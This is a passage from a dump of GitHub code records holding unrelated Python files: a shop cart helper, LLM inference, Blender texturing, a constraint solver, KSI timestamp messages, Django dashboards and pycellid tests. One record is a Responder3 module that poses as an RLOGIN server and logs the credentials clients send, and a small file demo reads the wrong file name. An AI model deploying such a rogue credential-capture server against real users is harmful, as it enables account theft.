user_cart = Cart.objects.get(user=user)\n if user_cart.get_item_count() > 0:\n user_cart.cart_products.clear()\n message = \"Cart cleared successfully\"\n message_type = \"success\"\n else:\n message = \"There are no items in your cart\"\n message_type = \"info\"\n else:\n user_cart = get_cart(request.session)\n cartlist = list(user_cart.keys())\n\n if len(cartlist) > 0:\n request.session['user-cart'] = json.dumps({})\n message = \"Cart cleared successfully\"\n message_type = \"success\"\n else:\n message = \"There are no items in your cart\"\n message_type = \"info\"\n\n return message, 
message_type","repo_name":"CodeKing12/shoppa","sub_path":"accounts/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31725513599","text":"from transformers import AutoTokenizer\nimport transformers\nimport torch\n\nmodel = \"NoahBSchwartz/llama-2-7b-LLM-Link8\"\n\ntokenizer = AutoTokenizer.from_pretrained(model)\npipeline = transformers.pipeline(\n \"text-generation\",\n model=model,\n torch_dtype=torch.float16,\n device_map=\"auto\",\n)\n\nprompt = \"\"\"What was the aim of the Gravity Probe B (GP-B) mission?\"\"\"\nsequences = pipeline(\n f\"[INST] {prompt} [/INST] What\",\n do_sample=True, # (True/False) - False leads to greedy decoding, True enables stochastic sampling\n top_k=10, # (0 to vocab size) - A lower value (e.g., 0) means no restriction, higher value narrows down the sampling pool\n top_p=0.9, # (0.0 to 1.0) - Lower value (e.g., 0.5) narrows down the sampling pool, 1.0 considers all tokens\n temperature=1.9, # (>0 to infinity) - Lower value (e.g., 0.7) makes output more focused and deterministic, higher values (e.g., 2.0) make it more random\n max_length=100, # (any positive integer) - Higher values allow for longer outputs, lower values restrict the output length\n min_length=2, # (any positive integer, typically <= max_length) - Higher values ensure longer outputs, lower values allow for shorter outputs\n num_return_sequences=1, # (any positive integer) - Higher values return more sequences, lower values return fewer\n no_repeat_ngram_size=0, # (0 to any positive integer) - Higher values prevent repetition of n-grams, lower values allow for more repetition\n early_stopping=False, # (True/False) - True stops generation once eos_token is reached, False allows generation past eos_token\n eos_token_id=tokenizer.eos_token_id, # Depends on the tokenizer; generally, it is set to the appropriate ID for the end-of-sequence token\n pad_token_id=tokenizer.pad_token_id, # Depends on the tokenizer; generally, it is set to the appropriate ID for the padding token\n repetition_penalty=1.0, # (>= 1.0) - Values > 1.0 discourage repetition, values < 1.0 encourage repetition (though it's unusual to use values < 1.0)\n length_penalty=2, # (>= 0.0) - Higher values (> 1.0) encourage longer sequences, values < 1.0 encourage shorter sequences\n)\nfor seq in sequences:\n print(f\"Result: {seq['generated_text']}\")\n","repo_name":"NoahBSchwartz/Promptimal","sub_path":"code/model_inference.py","file_name":"model_inference.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25485786909","text":"#!BPY\n\n\"\"\"\nName: 'City Texturing'\nBlender: 245\nGroup: 'Import'\nTooltip: 'A Procedural Texturing of a city'\n\"\"\"\n\n__author__ = \"Flora\"\n__url__ = ()\n__version__ = \"0.1\"\n__bpydoc__ = \"Empty\"\n\nimport Universe\nfrom Blender import *\nfrom random import *\nimport os\n\nif os.name==\"nt\":\n\ttextures = Universe.dirpath+\"/textures/\"\nelse:\n\ttextures = Universe.dirpath+\"/textures//\"\nworldnum = 1\nlandnum = 1\nroadnum = 1\nbuildnum = 1 \n\n\n############ World material ###################\ntnum = abs(int(random() * worldnum) + 1)\ntid = \"Sky%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'World')\nScene.GetCurrent().world = World.Get(tid)\n\n############ Landscape material ###################\ntnum = abs(int(random() * 
landnum) + 3)\ntid = \"Landscape%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nob = Object.Get(\"landscape\")\nme = ob.getData(False, True)\nme.materials = [matt]\t\nob.setMaterials([matt])\n\n###### Road material ############\ntnum = abs(int(random() * roadnum) + 2)\ntid = \"Road%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nfor ob in Object.Get():\n\tif ob.getName().find(\"Road\")!=-1:\n\t\tme = ob.getData(False, True)\n\t\tme.materials = [matt]\t\n\t\tob.setMaterials([matt])\n\n###### Wall material ############\ntnum = abs(int(random() * buildnum) + 2)\ntid = \"Wall%d\"%tnum\nLibrary.Open(textures + tid + \".blend\")\nLibrary.Load(tid, 'Material')\nmatt = Material.Get(tid)\nmatt.spec = 0\nmatt.ref = 0.3\nmatt.amb = 0.09\nfor ob in Object.Get():\n\tif ob.getName().find(\"Building\")!=-1:\n\t\tme = ob.getData(False, True)\n\t\tme.materials = [matt]\t\n\t\tob.setMaterials([matt])\n\n\nfor m in Material.Get():\n\tm.setAmb(0.08)\n\tm.setSpec(0.0)","repo_name":"ftasse/CrowdSimulation","sub_path":"texturing.py","file_name":"texturing.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7595710743","text":"from copy import deepcopy\nfrom random import choice, uniform, sample, choices\nfrom operator import methodcaller, attrgetter\nfrom collections import deque\n\n\nclass Variable:\n\n def __init__(self, domain: list, value=None, name = None) -> None:\n if type(domain) is not str:\n my_domain = domain\n else:\n my_domain = str(domain).split()[0]\n self.__domain = list(my_domain)\n self.__value = None\n self.__name = name\n if len(self.__domain) == 1:\n self.assign(self.__domain[0])\n if value is not None:\n self.assign(value)\n\n @classmethod\n def from_names_to_equal_domain(cls, names: set, domain: list, value=None) -> dict:\n name_to_variable_map = dict()\n for name in names:\n # if value is not None:\n # name_to_variable_map[name] = cls(domain, value)\n # else:\n name_to_variable_map[name] = cls(domain,value,name)\n return name_to_variable_map\n\n def __bool__(self) -> bool:\n return self.__value is not None\n\n def unique_assignment(self) -> bool:\n return len(self.__domain) == 1\n\n def __get_domain(self) -> list:\n return self.__domain\n def __set_domain(self, domain: set) -> None:\n self.__domain = domain\n domain = property(__get_domain, __set_domain)\n\n def __get_value(self):\n return self.__value\n value = property(__get_value)\n\n def __get_name(self):\n return self.__name\n name = property(__get_name)\n\n def assign(self, value):\n if self.__value is not None:\n raise OverAssignmentError(self)\n if value not in self.__domain:\n raise UncontainedValueError(self, value)\n self.__value = value\n\n def unassign(self):\n self.__value = None\n\n def __str__(self) -> str:\n name =\"\"\n if self.__name: name = str(self.__name)\n return name + \" (value: \" + str(self.value) + \"\\t domain: \" + str(self.__domain) + \")\"\n def __repr__(self) -> str:\n return self.__str__()\n\nclass VariableError(Exception):\n \"\"\" Base class for various Variable Errors. 
\"\"\"\n\nclass UncontainedValueError(VariableError):\n def __init__(self, variable: Variable, value):\n msg = \"Cannot assign variable: \" + str(variable) + \" with value: \" + str(value) + \\\n \" since it is not contained in variable's domain.\"\n super(UncontainedValueError, self).__init__(msg)\n\nclass OverAssignmentError(VariableError):\n def __init__(self, variable: Variable):\n msg = \"Over-assignment of an assigned variable: \" + str(variable) + \\\n \". variable must be unassigned before assignment.\"\n super(OverAssignmentError, self).__init__(msg)\n\n\nclass Constraint:\n def __init__(self, variables: list, evaluate_constraint):\n \"\"\" evaluate_constraint: a function tuple -> bool\"\"\"\n self.__variables = tuple(variables)\n\n self.__evaluate_constraint = evaluate_constraint\n self.__i_consistent_assignments = set()\n\n\n def __get_variables(self):\n return self.__variables\n variables = property(__get_variables)\n\n def __bool__(self) -> bool:\n # if self.__i_consistent_assignments:\n # return all(self.__variables) and self.is_consistent() and self.__is_i_consistent_assignment()\n return all(self.__variables) and self.is_consistent()\n\n __value_getter = attrgetter(\"value\")\n\n def is_consistent(self) -> bool:\n assigned_variables = []\n for var in self.__variables:\n if var:\n assigned_variables.append(var)\n if self.__i_consistent_assignments:\n return self.__evaluate_constraint(assigned_variables) and self.__is_i_consistent_assignment()\n return self.__evaluate_constraint(assigned_variables)\n\n def get_consistent_domain_values(self, variable: Variable) -> set:\n if variable not in self.__variables:\n raise UncontainedVariableError(self, variable)\n\n if variable.unique_assignment():\n return variable.domain\n\n original_value = variable.value\n variable.unassign()\n consistent_domain = set()\n for value in variable.domain:\n variable.assign(value)\n if self.is_consistent():\n consistent_domain.add(value)\n variable.unassign()\n\n if original_value is not None and variable.domain:\n variable.assign(original_value)\n return consistent_domain\n\n def update_i_consistent_assignments(self, i_consistent_assignments: set) -> None:\n if not i_consistent_assignments:\n self.__i_consistent_assignments.add(frozenset())\n for assignment in i_consistent_assignments:\n self.__i_consistent_assignments.add(frozenset(assignment))\n\n def __is_i_consistent_assignment(self) -> bool:\n all_values = map(Constraint.__value_getter, self.__variables)\n current_assignment = set(filter(None.__ne__, all_values))\n for assignment in self.__i_consistent_assignments:\n if assignment.issubset(current_assignment):\n return True\n return False\n\n def __str__(self) -> str:\n state = \"\\n constraint is completely assigned: \" + str(all(self.__variables)) + \\\n \". constraint is consistent: \" + str(self.is_consistent()) + \". constraint is satisfied: \" + \\\n str(bool(self)) + \". ]\\n\"\n return \"[ \" + \"\\n \".join(map(str, self.variables)) + state\n\nclass ConstraintError(Exception):\n \"\"\" Base class for various Constraint Errors. 
\"\"\"\nclass UncontainedVariableError(ConstraintError):\n def __init__(self, constraint: Constraint, variable: Variable):\n msg = \"Cannot return consistent domain of \" + str(variable) + \" since variable is not contained in\\n\" \\\n + str(constraint) + \"variables.\"\n super(UncontainedVariableError, self).__init__(msg)\n\n\nclass ConstraintProblem:\n\n def __init__(self, constraints):\n self.__constraints = tuple(constraints)\n self.__variables_to_constraints_map = _build_variables_to_constraints_mapping(self.__constraints)\n self.__constraint_graph = _build_constraint_graph_as_adjacency_list(self.__variables_to_constraints_map)\n\n def is_completely_assigned(self) -> bool:\n return all(self.__variables_to_constraints_map.keys())\n\n def is_consistently_assigned(self) -> bool:\n is_consistent_results = map(methodcaller(\"is_consistent\"), self.__constraints)\n return all(is_consistent_results)\n\n def get_variables(self):\n return self.__variables_to_constraints_map.keys()\n\n def get_unassigned_variables(self):\n unassigned_variables = []\n for var in self.__variables_to_constraints_map.keys():\n if not var:\n unassigned_variables.append(var)\n return unassigned_variables\n\n def get_neighbors(self, variable: Variable):\n return self.__constraint_graph[variable]\n\n def get_unassigned_neighbors(self, variable: Variable):\n unassigned_neighbors = []# filterfalse(None, self.__constraint_graph[variable])\n for const in self.__constraint_graph[variable]:\n if not const:\n unassigned_neighbors.append(const)\n return tuple(unassigned_neighbors)\n\n def get_constraints(self):\n return self.__constraints\n\n def get_unsatisfied_constraints(self):\n unsatisfied_constraints = [] #filterfalse(None, self.__constraints)\n for const in self.__constraints:\n if not const:\n unsatisfied_constraints.append(const)\n return frozenset(unsatisfied_constraints)\n\n def get_consistent_domain(self, variable: Variable) -> set:\n consistent_domains = map(methodcaller(\"get_consistent_domain_values\", variable),\n self.__variables_to_constraints_map[variable])\n return set.intersection(*consistent_domains)\n\n def __str__(self):\n state = \"\\n constraint_problem is completely assigned: \" + str(all(self.__variables_to_constraints_map)) + \\\n \". constraint_problem is consistent: \" + str(self.is_consistently_assigned()) + \\\n \". constraint_problem is satisfied: \" + str(all(self.__constraints)) + \". 
}\\n\"\n return \"{ \" + \"\\n \".join(map(str, self.__constraints)) + state\n\ndef _build_variables_to_constraints_mapping(constraints: list) -> dict:\n \"\"\" returns a dictionary var : list(constraints it is in) \"\"\"\n variables_to_constraints_map = dict() #dict(set)\n for const in constraints:\n for var in const.variables:\n try:\n variables_to_constraints_map[var].add(const)\n except:\n variables_to_constraints_map[var] = set()\n variables_to_constraints_map[var].add(const)\n return variables_to_constraints_map\n\ndef _build_constraint_graph_as_adjacency_list(variables_to_constraints_map: dict) -> dict:\n \"\"\" returns a dictionary var : set(variables that share constraints with var) \"\"\"\n constraints_graph = dict()\n for variable in variables_to_constraints_map:\n for constraint in variables_to_constraints_map[variable]:\n try:\n constraints_graph[variable].update(constraint.variables)\n except:\n constraints_graph[variable] = set()\n constraints_graph[variable].update(constraint.variables)\n constraints_graph[variable].discard(variable)\n return constraints_graph\n\n\ndef least_constraining_value(constraint_problem: ConstraintProblem, variable: Variable) -> list:\n unassigned_neighbors = constraint_problem.get_unassigned_neighbors(variable)\n\n def neighbors_consistent_domain_lengths(value) -> int:\n variable.assign(value)\n consistent_domain_lengths = map(lambda neighbor: len((constraint_problem.get_consistent_domain(neighbor))),\n unassigned_neighbors)\n variable.unassign()\n return sum(consistent_domain_lengths)\n\n return sorted(constraint_problem.get_consistent_domain(variable), key=neighbors_consistent_domain_lengths,\n reverse=True)\n\n\ndef minimum_remaining_values(constraint_problem: ConstraintProblem, variables = None):\n unassigned_variables = constraint_problem.get_unassigned_variables()\n min_variable = min(unassigned_variables, key=lambda var: len(constraint_problem.get_consistent_domain(var)))\n min_remaining_values = len(constraint_problem.get_consistent_domain(min_variable))\n min_variables = filter(lambda var: len(constraint_problem.get_consistent_domain(var)) == min_remaining_values,\n unassigned_variables)\n return list(min_variables)\n\ndef degree_heuristic(constraint_problem: ConstraintProblem, variables):\n if variables is not None: \n max_variable = max(variables, key=lambda var: len(constraint_problem.get_unassigned_neighbors(var)))\n return max_variable\n\n__actions_history = deque()\n\ndef classic_heuristic_backtracking_search(constraint_problem: ConstraintProblem, with_history: bool = False):\n __actions_history.clear()\n __classic_heuristic_backtrack(constraint_problem, with_history)\n if with_history:\n return __actions_history\n\ndef __classic_heuristic_backtrack(constraint_problem: ConstraintProblem, with_history: bool = False) -> bool:\n if constraint_problem.is_completely_assigned():\n if constraint_problem.is_consistently_assigned():\n return True\n return False\n unassigned_variables = constraint_problem.get_unassigned_variables()\n max_r = len(unassigned_variables)\n if max_r == 1: n_choice = 1\n else: n_choice = choice(range(1,max_r))\n selected_unassigned_vars = set(choices(unassigned_variables,k = n_choice))\n selected_variable = degree_heuristic(constraint_problem, selected_unassigned_vars)\n\n selected_domain = constraint_problem.get_consistent_domain(selected_variable)\n for value in selected_domain:\n selected_variable.assign(value)\n if with_history:\n __actions_history.append((selected_variable, value))\n\n if 
__classic_heuristic_backtrack(constraint_problem, with_history):\n return True\n\n selected_variable.unassign()\n if with_history:\n __actions_history.append((selected_variable, None))\n\n return False\n\n","repo_name":"NileyGF/Simulation-of-Recommendation-Systems","sub_path":"CSP.py","file_name":"CSP.py","file_ext":"py","file_size_in_byte":12394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"5227466942","text":"import json\nfrom datetime import datetime\nfrom enum import Enum, unique\nfrom base64 import standard_b64encode, standard_b64decode\nfrom dateutil.parser import parse\n\nfrom ksi.identifier import Identifier\nfrom ksi import IDENTIFIER_BASE_NAME\n\n\ndef bytes_to_base64_str(b: bytes) -> str:\n if not b:\n return \"None\"\n\n return str(standard_b64encode(b), encoding=\"ascii\")\n\n\nclass TimestampRequest:\n \"\"\"\n Convenience object for a timestamp request.\n\n Notation:\n x = hash(message || z_i)\n \"\"\"\n\n def __init__(self, x: bytes, ID_C: Identifier):\n \"\"\"\n Create an object timestamp request with the provided arguments.\n :param x: The hash of the request\n :type x: bytes\n :param ID_C: The client's identifier\n :type ID_C: Identifier\n \"\"\"\n assert isinstance(x, bytes) and isinstance(ID_C, Identifier)\n\n self.x = x\n self.ID_C = ID_C\n\n def __str__(self) -> str:\n \"\"\"\n :return: A string representation of the object\n :rtype: str\n \"\"\"\n return \"({x}, {idc})\".format(x=self.x.hex(), idc=str(self.ID_C))\n\n def to_json(self) -> str:\n \"\"\"\n :return: The JSON string representation of the object\n :rtype: str\n \"\"\"\n return json.dumps({'x': bytes_to_base64_str(self.x), 'ID_C': str(self.ID_C)})\n\n @staticmethod\n def from_json(json_obj: dict):\n \"\"\"\n :param json_obj: JSON representation of a TimestampRequest object\n :type json_obj: dict\n :return: A new TimestampRequest from the json parameter\n :rtype: TimestampRequest\n \"\"\"\n assert 'x' in json_obj and 'ID_C' in json_obj\n\n id = json_obj['ID_C'] # type: str\n if id.startswith(IDENTIFIER_BASE_NAME):\n # Removes IDENTIFIER_BASE_NAME from the beginning of the identifier string\n id = id[len(IDENTIFIER_BASE_NAME):]\n\n return TimestampRequest(standard_b64decode(json_obj['x']), Identifier(id))\n\n\n@unique\nclass KSIErrorCodes(Enum):\n NO_ERROR = 0\n UNKNOWN_CERTIFICATE = 1\n CERTIFICATE_EXPIRED = 2\n CERTIFICATE_TOO_EARLY = 3\n UNSPECIFIED_ERROR = 4\n\n def __str__(self):\n return self.name\n\n\nclass TimestampResponse:\n \"\"\"\n Convenience object for a timestamp response (this corresponds to S_t in the LaTeX notation of KSI).\n \"\"\"\n\n def __init__(self, x, ID_S: Identifier, ID_C: Identifier, t: datetime, status_code: KSIErrorCodes):\n \"\"\"\n Create an object timestamp response with the provided arguments.\n The signature is set to None.\n :param x: The hash of the request\n :param ID_S: The server's identifier\n :type ID_S: Identifier\n :param ID_C: The client's identifier\n :type ID_C: Identifier\n :param t: The time at which the request has been signed\n :type t: datetime\n :param status_code: A status code filled by the server to indicate errors or the lack thereof\n :type status_code: KSIErrorCodes\n \"\"\"\n assert isinstance(ID_S, Identifier) and isinstance(ID_C, Identifier)\n assert isinstance(t, datetime)\n assert isinstance(status_code, KSIErrorCodes)\n\n self.x = x\n self.ID_C = ID_C\n self.ID_S = ID_S\n self.t = t\n self.signature = None\n self.status_code = status_code\n\n def __str__(self) -> str:\n \"\"\"\n 
:return: A string representation of the object\n :rtype: str\n \"\"\"\n if isinstance(self.x, bytes):\n x_str = self.x.hex()\n else:\n x_str = self.x.hexdigest()\n\n return \"(x: {x}, ID_C: {idc})\\t=>\\t(status_code: {status_code}, ID_S: {ids}, t: {t}, signature: {sig})\".format(\n x=x_str,\n idc=str(self.ID_C),\n status_code=str(self.status_code),\n ids=str(self.ID_S),\n t=self.t.isoformat(),\n sig=self.signature)\n\n def to_json(self) -> str:\n \"\"\"\n :return: A JSON string representation of the object\n :rtype: str\n \"\"\"\n sig_str = \"None\"\n\n if self.signature:\n sig_str = str(self.signature, encoding=\"ascii\")\n\n return json.dumps({'status_code': str(self.status_code),\n 'x': bytes_to_base64_str(self.x),\n 'ID_C': str(self.ID_C),\n 'ID_S': str(self.ID_S),\n 't': self.t.isoformat(),\n 'signature': sig_str})\n\n @staticmethod\n def from_json_dict(json_obj: dict):\n \"\"\"\n :param json_obj: A JSON representation of the TimestampResponse object\n :type json_obj: dict\n :return: A new TimestampResponse built from the json_obj parameter\n :rtype: TimestampResponse\n \"\"\"\n assert 'status_code' in json_obj\n assert 'x' in json_obj\n assert 'ID_C' in json_obj\n assert 'ID_S' in json_obj\n assert 't' in json_obj\n assert 'signature' in json_obj\n\n status_code = KSIErrorCodes[json_obj['status_code']]\n x = standard_b64decode(json_obj['x'])\n ID_C = Identifier(json_obj['ID_C'][len(IDENTIFIER_BASE_NAME):])\n ID_S = Identifier(json_obj['ID_S'][len(IDENTIFIER_BASE_NAME):])\n t = parse(json_obj['t'])\n\n if json_obj['signature'] == \"None\":\n signature = None\n else:\n signature = bytes(json_obj['signature'], encoding=\"ascii\")\n\n res = TimestampResponse(x, ID_S, ID_C, t, status_code)\n res.signature = signature\n\n return res\n","repo_name":"alan-mushi/KSI","sub_path":"ksi/ksi_messages.py","file_name":"ksi_messages.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39218613505","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic.simple import direct_to_template\n\nfrom aplicaciones.models import ApplicationDocument\nfrom accounts.models import Applicant, Broker, Agency, Landlord\nfrom rentals.models import Rental\nfrom dashboard.forms import UnitAndRentalCreationForm, BrokerAdoptionForm\n\n@login_required\ndef applicant_dashboard(request, template='dashboard/applicant_dashboard.html'):\n applicant = Applicant.objects.get(user=request.user)\n application_document_list = ApplicationDocument.objects.filter(applicant=applicant)\n # avoiding generic.object_list because this view will ultimately contain more\n return direct_to_template(request, template, locals())\n\n@login_required\ndef broker_dashboard(request, template='dashboard/broker_dashboard.html'):\n broker = Broker.objects.get(user=request.user)\n unit_and_rental_creation_form = UnitAndRentalCreationForm()\n # broker_rental_list is the list of rentals the broker has added himself.\n # this is independent of the set that his agency represents\n # the agency can't see broker.rentals, but the agency can see\n # ANY application document that his brokers have started, even outside\n # the agency/ is this a problem?\n # agency rental list is the list that his affiliated agency represents\n # its assumed he has access to all of the agency 
represented rentals\n\n #broker.agency.rentals.add(rental)\n if request.method == \"POST\":\n if request.POST.has_key(\"address1\") and request.POST.has_key(\"rent_amount\"):\n unit_and_rental_creation_form = UnitAndRentalCreationForm(request.POST)\n if unit_and_rental_creation_form.is_valid():\n _cleaned_data = unit_and_rental_creation_form.cleaned_data\n rent_amount = _cleaned_data['rent_amount']\n start_date = _cleaned_data['start_date']\n landlord = _cleaned_data['landlord']\n # TODO: save method only saves the Unit (non multiple inheritance)\n # see models\n unit = unit_and_rental_creation_form.save()\n rental = Rental(unit=unit, creator=request.user,\n rent_amount=rent_amount, start_date=start_date)\n if landlord:\n rental.landlord = landlord\n rental.save()\n if broker.agency:\n broker.agency.rentals.add(rental)\n messages.info(request, \"You successfully added a rental unit for your agency\")\n else:\n broker.rentals.add(rental)\n messages.info(request, \"You are not currently affiliated with an agency on Leasely.com. This rental unit has been added to your personal broker dashboard to track.\")\n HttpResponseRedirect(reverse(\"broker_dashboard\"))\n\n application_document_list = ApplicationDocument.objects.filter(broker=broker)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef agency_dashboard(request, template='dashboard/agency_dashboard.html'):\n agency = Agency.objects.get(user=request.user)\n broker_adoption_form = BrokerAdoptionForm()\n\n if request.method == \"POST\":\n # broker adoption form\n if request.POST.has_key(\"broker\"):\n broker_adoption_form = BrokerAdoptionForm(request.POST)\n if broker_adoption_form.is_valid():\n broker = broker_adoption_form.cleaned_data['broker']\n broker.agency = agency\n broker.save()\n messages.info(request, \"broker %s was successfully added to your agency roster\" % broker)\n\n broker_list = Broker.objects.filter(agency=agency)\n rental_list = agency.rentals.all()\n application_document_list = ApplicationDocument.objects.filter(rental__in=rental_list)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef landlord_dashboard(request, template='dashboard/landlord_dashboard.html'):\n landlord = Landlord.objects.get(user=request.user)\n rentals = Rental.objects.filter(landlord=landlord)\n application_document_list = ApplicationDocument.objects.filter(rental__in=rentals)\n return direct_to_template(request, template, locals())\n\n@login_required\ndef dashboard(request, view=None):\n \"\"\"Redirect to the user's specific dashboard.\n\n The site is designed so that each user has a default user view.\n If the user intends to use the site primarily as a broker, its possible\n that the user will never even know that the other functionality exists.\n\n Users technically can act in all possible user capacities and thus can also\n set settings as each user type (applicant, broker, agency, landlord). 
This\n plain, unspecified \"dashboard\" view redirects them to their default view.\n\n We may consider changing this to whatever user_type view they were on last.\n \"\"\"\n view = request.user.get_profile().default_view\n REDIRECT = {\n \"Applicant\": \"applicant_dashboard\",\n \"Broker\": \"broker_dashboard\",\n \"Agency\": \"agency_dashboard\",\n \"Landlord\": \"landlord_dashboard\",\n }\n return HttpResponseRedirect(reverse(REDIRECT[view]))\n\n","repo_name":"ezl/ezl_alpha","sub_path":"apps/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"37445871402","text":"import enum\nimport logging\nimport asyncio\n\nfrom responder3.core.logging.logger import *\nfrom responder3.core.asyncio_helpers import R3ConnectionClosed\nfrom responder3.core.commons import *\nfrom responder3.protocols.RLOGIN import *\nfrom responder3.core.servertemplate import ResponderServer, ResponderServerSession\n\n\n\n\nclass RLOGINSession(ResponderServerSession):\n\tdef __init__(self, connection, log_queue):\n\t\tResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)\n\t\tself.current_state = RloginSessionState.BEFORE_AUTH\n\nclass RLOGIN(ResponderServer):\n\tdef init(self):\n\t\tpass\n\n\tasync def send_data(self, data):\n\t\tself.cwriter.write(data)\n\t\tawait self.cwriter.drain()\n\n\t@r3trafficlogexception\n\tasync def run(self):\n\t\t# main loop\n\t\twhile not self.shutdown_evt.is_set():\n\t\t\tif self.session.current_state == RloginSessionState.BEFORE_AUTH:\n\t\t\t\ttry:\n\t\t\t\t\tresult = await asyncio.gather(*[AuthenticationMessage.from_streamreader(self.creader, timeout=None)], return_exceptions=True)\n\n\t\t\t\texcept asyncio.CancelledError as e:\n\t\t\t\t\traise e\n\t\t\t\tif isinstance(result[0], R3ConnectionClosed):\n\t\t\t\t\treturn\n\t\t\t\telif isinstance(result[0], Exception):\n\t\t\t\t\traise result[0]\n\t\t\t\telse:\n\t\t\t\t\tauth_msg = result[0]\n\n\t\t\t\tawait self.logger.credential(auth_msg.to_credential())\n\n\t\t\t\t#no authenticator for now\n\t\t\t\treturn\n\n\t\t\t\t# In case of succsess, send a null byte and set current_state\n\t\t\t\t#self.session.current_state = RloginSessionState.AUTHENTICATED\n\t\t\t\t#await self.send_data(b'\\x00')\n\t\t\t\n\t\t\telif self.session.current_state == RloginSessionState.AUTHENTICATED:\n\t\t\t\t#raise NotImplementedError\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\traise Exception('Unknown RLOGIN state!')\n","repo_name":"skelsec/Responder3","sub_path":"responder3/servers/RLOGIN.py","file_name":"RLOGIN.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"33"} +{"seq_id":"38925879632","text":"f = open('data.bin', 'wb')\ntxt = bytes('Python Programming ','utf-8')\ntxt += bytes('hello','utf-8')\nf.write(txt)\nf.close()\n\nprint(\"อ่านข้อมูลจาก binary file \\n\")\nf = open('data','rb')\nprint(f.read())\nf.close()","repo_name":"waranyapasompan/python02","sub_path":"lab7-1.py","file_name":"lab7-1.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38196478159","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport random\n\nimport numpy as np\n\nimport pandas as pd\n\nimport pycellid.io as ld\n\nimport pytest as pt\n\n# 
=============================================================================\n# Parameter & fixtures\n# =============================================================================\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nbase = os.path.dirname(ROOT_DIR)\n\n# =============================================================================\n# Test read, parse: Folders, File names\n# =============================================================================\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_file_path_fails(invalid_f_name_fail):\n ld.make_df(invalid_f_name_fail)\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_pos_file_path_fails():\n valid_f = os.path.join(base, \"tests\", \"pydata\", \"lugar01\", \"out_all\")\n ld.make_df(valid_f)\n\n\n@pt.mark.xfail(raises=FileNotFoundError)\ndef test_make_df_file_pos_fails(invalid_pos_fail):\n ld.make_df(invalid_pos_fail)\n\n\ndef test_make_df_file():\n file = os.path.join(base, \"tests\", \"pydata\", \"Position2e2+2\", \"out_all\")\n df = ld.make_df(file)\n assert df[\"pos\"].unique() == 202\n\n\ndef test_merge_tables_fnd():\n f = np.random.choice([\"P\", \"p\", \"Pos\", \"Position\", \"Posicion\"])\n n = np.random.randint(5, 200)\n fnd = os.path.join(base, \"samples_cellid\", f\"{f}{n}\")\n with pt.raises(FileExistsError):\n ld.merge_tables(fnd)\n\n\ndef test_merge_tables_fnd_file():\n n = np.random.randint(1, 4)\n folder = os.path.join(base, \"samples_cellid\", f\"P{n}\")\n data_table = random.choice(\n [\"out\", \"out_alll\", \"Pos\", \"tablas\", \"datos.txt\"]\n )\n m_data = random.choice([\"map\", \"mapeo\", \"m\", \"seguimiento\"])\n with pt.raises(FileExistsError):\n ld.merge_tables(path=folder, n_data=data_table, n_mdata=m_data)\n\n\ndef test_read_mapping_file(create_mapping_file):\n df1 = ld.read_df(create_mapping_file)\n df2 = pd.DataFrame(\n {\n \"flag\": [0, 1, 2, 3],\n \"fluor\": [\"BF_Pos02\", \"YFP_Pos02\", \"CFP_Pos02\", \"RFP_Pos02\"],\n }\n )\n assert np.array_equal(df1.values, df2.values)\n\n\ndef test_read_out_all_file(create_out_all_file):\n rs = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))\n df1 = ld.read_df(create_out_all_file)\n df2 = pd.DataFrame(\n {\n \"area\": np.linspace(200, 1000, 300, dtype=int),\n \"f_nuc\": np.linspace(50, 500, 300, dtype=int),\n \"f_tot\": np.linspace(50, 500, 300, dtype=int),\n \"f_vac\": np.linspace(50, 500, 300, dtype=int),\n \"flag\": rs.randint(0, 4, 300, dtype=int),\n \"cellID\": np.linspace(100, 400, 300, endpoint=True, dtype=int),\n \"ucid\": np.linspace(100, 400, 300, endpoint=True, dtype=int)\n + 100000000000,\n \"t_frame\": rs.randint(1, 13, 300, dtype=int),\n \"pos\": np.ones(300, dtype=int),\n }\n )\n assert np.array_equal(df1.values, df2.values)\n\n\n# =============================================================================\n# test crated values: col_names, UCID\n# =============================================================================\n\n\ndef test_make_df_c_names(rand_make_df):\n for name in rand_make_df.columns:\n assert \".\" not in name\n assert \" \" not in name[0]\n assert \" \" not in name[-1]\n\n\ndef test_fluor_col(create_out_all_file, create_mapping_file):\n ch = [\"BF\", \"YFP\", \"CFP\", \"RFP\"]\n var = [\"f_nuc\", 